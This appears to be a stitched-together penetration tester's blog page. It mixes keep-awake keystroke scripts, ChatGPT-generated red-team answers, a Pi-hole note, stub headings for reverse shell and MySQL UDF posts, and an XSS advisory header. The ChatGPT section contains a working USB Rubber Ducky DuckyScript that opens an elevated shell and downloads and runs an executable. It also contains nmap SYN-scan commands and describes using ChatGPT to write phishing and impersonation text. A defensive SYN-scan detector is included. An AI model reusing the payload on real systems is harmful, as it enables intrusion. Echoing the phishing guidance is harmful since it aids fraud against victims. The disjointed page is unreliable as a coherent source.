Simple keystroke to prevent sleep

A simple script that double-taps Num Lock to keep the machine from sleeping.
This is a very simple script which prevents the machine from going to sleep.

Python 

import pyautogui
import time

# Tap Num Lock twice so its state ends up unchanged, then wait a minute.
# The synthetic key presses count as user input and reset the idle timer.
while True:
    pyautogui.press('numlock')
    pyautogui.press('numlock')
    time.sleep(60)
Number lock key double tap
Windows PowerShell

# SendKeys lives in System.Windows.Forms, which has to be loaded first
Add-Type -AssemblyName System.Windows.Forms

while ($true) {
    # two taps leave the Num Lock state as it was
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    Start-Sleep -Seconds 60
}



Here is the same script written in PowerShell using the Send() method of the System.Windows.Forms.SendKeys class instead of SendWait():

# load the assembly once, before the loop
Add-Type -AssemblyName System.Windows.Forms

while ($true) {
    [System.Windows.Forms.SendKeys]::Send("{NUMLOCK}")
    [System.Windows.Forms.SendKeys]::Send("{NUMLOCK}")
    Start-Sleep -Seconds 60
}


Here is the same script written in PowerShell using the SendWait() method from the System.Windows.Forms.SendKeys class:

Add-Type -AssemblyName System.Windows.Forms

while ($true) {
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    Start-Sleep -Seconds 60
}

ChatGPT in Red Teaming


Disclaimer: All text below is generated by ChatGPT.

How can ChatGPT help in red teaming?

ChatGPT is a variant of the GPT (Generative Pre-training Transformer) language model that is specifically designed to generate chatbot responses based on a given prompt. It can be used in red teaming to generate convincing responses during social engineering attacks or to impersonate real people in online communication.

For example, an attacker could use ChatGPT to generate responses in a chat conversation with a target, pretending to be a trusted individual or a customer service representative. They could also use it to generate phishing emails or other written communication that is designed to trick the target into divulging sensitive information or performing a specific action.

It is important to note that ChatGPT, like any other language model, is not capable of independently carrying out attacks or making decisions. It is simply a tool that can be used to generate text based on a given prompt. It is up to the attacker to use this tool in a way that is effective and aligned with their goals.

Write a DuckyScript to open PowerShell with admin privileges and download and execute an EXE file?

Here is a DuckyScript that will open a command prompt with administrative privileges and then download and execute an EXE file:

DELAY 1000
GUI r
DELAY 200
STRING powershell
DELAY 200
CONTROL SHIFT ENTER
DELAY 200
STRING Start-Process cmd -Verb runAs
DELAY 200
ENTER
DELAY 200
STRING powershell -Command "& {Invoke-WebRequest -OutFile c:\temp\example.exe https://example.com/example.exe}"
DELAY 200
ENTER
DELAY 200
STRING c:\temp\example.exe
DELAY 200
ENTER

This script will first delay for 1 second (1000 milliseconds). It will then press the “Windows” key and the “r” key to open the “Run” dialog. It will then type “powershell” and press “Enter” to open a PowerShell window.

Next, it will press “Control,” “Shift,” and “Enter” simultaneously to open a command prompt with administrative privileges. It will then type the command “Start-Process cmd -Verb runAs” and press “Enter” to open a command prompt with administrative privileges.

Once the command prompt is open, the script will use the “powershell” command to download the EXE file from the specified URL and save it to the “c:\temp” directory. Finally, it will execute the EXE file by typing its path and pressing “Enter.”

Note that this script assumes that the USB Rubber Ducky is being used on a Windows system. If you are using a different operating system, you may need to modify the script accordingly.

Nmap scan to scan 192.168.1.1/24, all ports, in stealth mode?

To scan all ports on all hosts in the 192.168.1.1/24 subnet in stealth mode using nmap, you can use the following command:

nmap -sS 192.168.1.1/24

The “-sS” option tells nmap to perform a SYN scan, which is a type of stealth scan that does not send a full TCP connection request to the target host. This can help to evade detection by firewalls and other security measures that are designed to detect and block port scans.

By default, nmap will scan the most common 1,000 ports for each host. If you want to scan all 65535 possible ports, you can use the “-p-” option:

nmap -sS -p- 192.168.1.1/24

This will take longer to complete, as nmap will have to perform significantly more network traffic.

It is important to note that port scanning is often considered a potentially malicious activity, and you should only perform port scans on systems that you have permission to scan. Additionally, you should be aware of any laws or regulations in your jurisdiction that may prohibit or regulate port scanning.
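A defender-side counterpart to the answer above, added here as an example and not part of the post or of ChatGPT's text: the half-open pattern that makes a SYN scan "stealthy" (a SYN is sent, but the handshake is never completed with an ACK) is also what makes it detectable. The script runs over constructed flow records (not captured traffic) and alerts on a source that leaves many half-open ports on one host or probes the same port across many hosts; the thresholds are illustrative assumptions.

```python
from collections import defaultdict

# Thresholds are illustrative assumptions, not tuned values.
PORT_THRESHOLD = 10   # distinct half-open (dst, port) pairs from one source
HOST_THRESHOLD = 5    # distinct hosts probed by one source (a sweep of the /24)


def half_open_targets(flows):
    """Map each source to the (dst, dport) pairs it sent a SYN to but never ACKed.

    flows: iterable of (src, dst, dport, flags) for client-to-server packets,
    flags being a string such as "S", "A" or "R". A SYN scan answers the
    target's SYN/ACK with RST (or nothing), so no ACK ever follows the SYN.
    """
    syn = defaultdict(set)
    ack = defaultdict(set)
    for src, dst, dport, flags in flows:
        if "S" in flags and "A" not in flags:
            syn[src].add((dst, dport))
        elif "A" in flags:
            ack[src].add((dst, dport))
    return {src: targets - ack[src] for src, targets in syn.items()}


def detect_syn_scans(flows, port_threshold=PORT_THRESHOLD, host_threshold=HOST_THRESHOLD):
    """Return one alert dict per source whose half-open activity crosses a threshold."""
    alerts = []
    for src, targets in sorted(half_open_targets(flows).items()):
        ports = len(targets)
        hosts = len({dst for dst, _ in targets})
        if ports >= port_threshold or hosts >= host_threshold:
            alerts.append({"src": src, "half_open_ports": ports, "hosts": hosts})
    return alerts


def constructed_sample():
    """Constructed flow records: one normal client and one scanner. Not captured data."""
    flows = []
    # 10.0.0.7 completes handshakes (SYN, then ACK) to two services.
    for dst, port in (("192.168.1.10", 443), ("192.168.1.20", 80)):
        flows += [("10.0.0.7", dst, port, "S"), ("10.0.0.7", dst, port, "A")]
    # 10.0.0.5 sends SYN then RST to twelve ports on one host (nmap -sS behaviour).
    for port in (21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389):
        flows += [("10.0.0.5", "192.168.1.10", port, "S"), ("10.0.0.5", "192.168.1.10", port, "R")]
    # ...and sweeps port 445 across six more hosts in the subnet.
    for host in range(1, 7):
        flows.append(("10.0.0.5", f"192.168.1.{host}", 445, "S"))
    return flows


if __name__ == "__main__":
    for alert in detect_syn_scans(constructed_sample()):
        print(alert)
```

On real data the same logic runs over NetFlow or firewall connection logs, with the thresholds tuned to the network's normal fan-out so that busy legitimate clients do not alert.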

Pi-Holed


Very recently I felt one of my virtual machines was infected by malware, and I was thinking about restoring it to a clean snapshot, but then I thought, let's find other ways to identify and block these types of attacks. There were a few more issues I wanted to resolve on my network, which included blocking advertisements on the pages I visit, blocking all malicious IOCs over the network, etc. Also, one of the games I play on PS4, Battlefield 4, wasn't able to connect to online gaming due to blocking of DNS at the ISP.

I started doing my research, where I discovered “Pi-Hole”. Basically, Pi-Hole is a network-wide advertisement-blocking solution (a DNS server) that can be installed on a virtual machine or on your own hardware, e.g. a Raspberry Pi 3 in my case.


Rubber Ducky


During my recent internal black-box testing, I got a chance to use the Rubber Ducky. This device looks like a USB thumb drive, can be concealed inside a standard USB case, and acts as a keyboard. The script written on the SD card is called Ducky Script, which is very easy to understand.

Since there are a lot of write-ups on the internet about the Ducky, I'll just be posting one of the scripts I used in my recent pen-testing. I hope you may find it useful.

The script is written keeping in mind that not all Windows OS versions are the same, and hardware specifications differ as well. While using the default scripts, at times the system was not able to type the complete code, hence you will see many spaces and delays.


Reverse Shell


MySQL UDF Injection


While performing web application penetration testing, at times you find that the web application is running against the MySQL database with “root” credentials. This is one of the biggest no-nos of security. In this case, we can get a root shell on the machine with just a few commands. Here comes my second cheat sheet so that I do not forget this anymore.

Web Shell MySQL


VLDPersonals Cross-Site Scripting XSS


# Exploit Title: VLD Personals – Cross Site Scripting (Reflective) with admin authentication
# Notified VLD Personals Date: 02/FEB/2015
# Exploit Author: Mr T
# Exploit Author's Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7.1
# Fixed Version: 2.7.2
# Tested on: Windows / Linux

XSS in "what" Parameter
